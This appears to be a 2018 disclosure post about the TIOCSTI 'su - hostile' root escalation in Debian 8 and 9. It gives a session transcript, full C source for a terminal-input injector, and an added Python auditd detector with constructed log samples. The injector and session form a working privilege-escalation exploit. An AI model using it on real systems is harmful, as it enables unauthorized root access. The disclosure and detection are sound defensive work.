Wed Jun 13 12:25:34 EEST 2018

Ancient "su - hostile" vulnerability in Debian 8 and 9

Just FYI.

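Warning: This issue is rather old, known since at least 2005 and
probably much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: Doing "su - hostile" in Debian 8 and 9 may lead
to root privilege escalation. Default sudo -u is probably
affected too.

Per a chat with some admins, they use su - user.

Session (the background job outlives the guest4 shell and, via the
TIOCSTI ioctl on the shared terminal, queues "id" as input that the
root shell then reads and runs):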

root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c 
/*
 *
 * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
 * */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>

void stackchar(char c)
{
  if (ioctl(0, TIOCSTI, &c) < 0) {
    perror("ioctl");
    exit(1);
  }
}
int main(int argc, char *argv[])
{
  int i, j;
  char c;

  for (i = 1; i < argc; i++) {
    for (j=0; (c = argv[i][j]); j++) {
      stackchar(c);
    }
    stackchar('\n');
  }
  exit(0);
}
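
Detection side of the session above, as an added example that is not part of the original post: it scans raw auditd SYSCALL records for successful TIOCSTI ioctls and flags those where the process uid differs from the session's login uid (auid), which is the "su - user" pattern. It assumes auditd logs ioctl calls with a rule such as `-a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -k tiocsti`; the log lines are constructed samples.

```python
import re

TIOCSTI = 0x5412  # Linux ioctl request number for TIOCSTI
IOCTL_NR = {"c000003e": 16, "40000003": 54}  # audit arch -> ioctl syscall nr (x86_64, i386)

# Constructed sample records (not from the original post), raw auditd SYSCALL format.
# Assumed audit rule: -a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -k tiocsti
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1528881944.101:901): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=7ffd3b1c2e47 a3=0 items=0 ppid=4737 pid=4741 auid=0 uid=1004 gid=1004 euid=1004 tty=pts0 ses=3 comm="a.out" exe="/tmp/a.out" key="tiocsti"
type=SYSCALL msg=audit(1528881950.250:902): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5401 a2=7ffe11aa0010 a3=0 items=0 ppid=1 pid=4800 auid=1004 uid=1004 gid=1004 euid=1004 tty=pts1 ses=4 comm="bash" exe="/bin/bash" key=(null)
type=SYSCALL msg=audit(1528881960.007:903): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=7ffc0aa1b2c3 a3=0 items=0 ppid=5000 pid=5001 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts2 ses=5 comm="editor" exe="/usr/bin/editor" key="tiocsti"
"""

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """Split one raw audit record into a dict of its key=value fields."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def tiocsti_events(log):
    """Yield SYSCALL records that are successful ioctl(fd, TIOCSTI, ...) calls."""
    for line in log.splitlines():
        rec = parse(line)
        if rec.get("type") != "SYSCALL" or rec.get("success") != "yes":
            continue
        if int(rec.get("syscall", -1)) != IOCTL_NR.get(rec.get("arch")):
            continue
        # audit prints a0..a3 in hex; the kernel uses the low 32 bits as the request
        if int(rec.get("a1", "0"), 16) & 0xFFFFFFFF == TIOCSTI:
            yield rec


def cross_identity(log):
    """TIOCSTI issued under a uid other than the login uid (auid) of the session:
    input queued this way is read by the shell that ran su once the user exits."""
    return [r for r in tiocsti_events(log) if r.get("auid") != r.get("uid")]


if __name__ == "__main__":
    for r in cross_identity(SAMPLE_LOG):
        print(f"TIOCSTI on {r['tty']} by uid={r['uid']} (auid={r['auid']}) exe={r['exe']}")
```
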

Posted by su do we